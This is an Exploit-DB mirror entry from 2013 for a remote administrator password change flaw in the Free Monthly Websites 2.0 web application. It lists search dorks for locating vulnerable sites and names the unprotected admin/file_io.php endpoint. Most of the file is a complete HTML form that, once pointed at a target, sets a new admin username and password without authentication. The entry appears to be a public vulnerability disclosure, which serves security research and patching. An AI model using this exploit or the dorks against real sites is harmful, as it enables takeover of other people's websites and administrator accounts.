exploit-db-mirror/exploits/php/webapps/24953.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

63 lines
No EOL
3.3 KiB
Text
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

==========================================================================================
# Title : Free Monthly Websites 2.0 Administrator Remote Password Change
# Date : 10/04/2013
# Name : Free Monthly Websites
# Affected Version : 2.0
# Vendor : http://www.freemonthlywebsites2.com/
# Category : Web applications
# Severity : High
# Tested on : Firefox | Google Chrome | Internet Explorer
# Dorks : inurl:/index_ebay.php | "Powered by: Resell Rights Fortune" | Powered By: Free Monthly Websites 2.0
# About the software : Free Monthly Websites 2.0 is here and you no longer have to worry about editing complicated HTML code as we have taken care of that for you, and you no longer have to worry about anything to do with website design as we have taken care of that for you too, adding your Google AdSense Publisher code, taken care of, ClickBank! All done for you, here's how it works. (taken from the vendor's page)
==========================================================================================
# Author : Yassin Aboukir
# Contact : Yaaboukir [At] Gmail [Dot] com
# Site : www.y-aboukir.info
# Greetz : To All Ethical Hackers!
==========================================================================================
# Proof of concept :
Vulnerable page : http://target.com/[path]/admin/file_io.php
<form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
<input type="hidden" name="do_type" value="admin_settings_write">
# How to exploit :
- Change http://www.target.com/[path]/ to the link of target website.
<html>
<head><title>Free Monthly Websites 2.0 | Remote Admin password Change</title></head>
<body>
<td width="645" align="center" valign="top"><table width="645" border="0" align="center" cellpadding="0" cellspacing="0">
<form name="frm" action="http://www.target.com/[path]/admin/file_io.php" method="post" onSubmit="return chk()">
<input type="hidden" name="do_type" value="admin_settings_write">
<tr>
<td height="100" colspan="2" align="center" valign="middle">
<font color="#808080"><b><font size="5">Free Monthly Websites 2.0 |</font><font size="6"> </font></b> <font size="4">Remote Admin password Change</font></font></td>
</tr>
<tr>
<td width="300" height="50" align="center" valign="middle">
<font color="#808080">New Username:</font>
</td>
<td width="345" height="50" align="left" valign="middle"><input name="user_name" type="text" size="40">  </td>
</tr>
</td>
<tr>
<td width="300" height="62" align="center" valign="middle">
<font color="#808080">New Password: </font> </td>
<td width="345" height="62" align="left" valign="middle"><input name="password" type="text" size="40">  </td>
</tr>
<tr>
<td height="50" colspan="2" align="center" valign="middle" ><p>
<input type="submit" name="Submit" value="Save" style="font-weight: 700"><br>
</td>
</tr>
<tr>
<td height="50" colspan="2" align="center" valign="middle" class="main2"><p>Author<b> : </b>
<a href="http://www.y-aboukir.info/" style="text-decoration: none">
<font color="#000000">Yassin ABOUKIR</font></a></p></td>
</tr>
</body>
<html>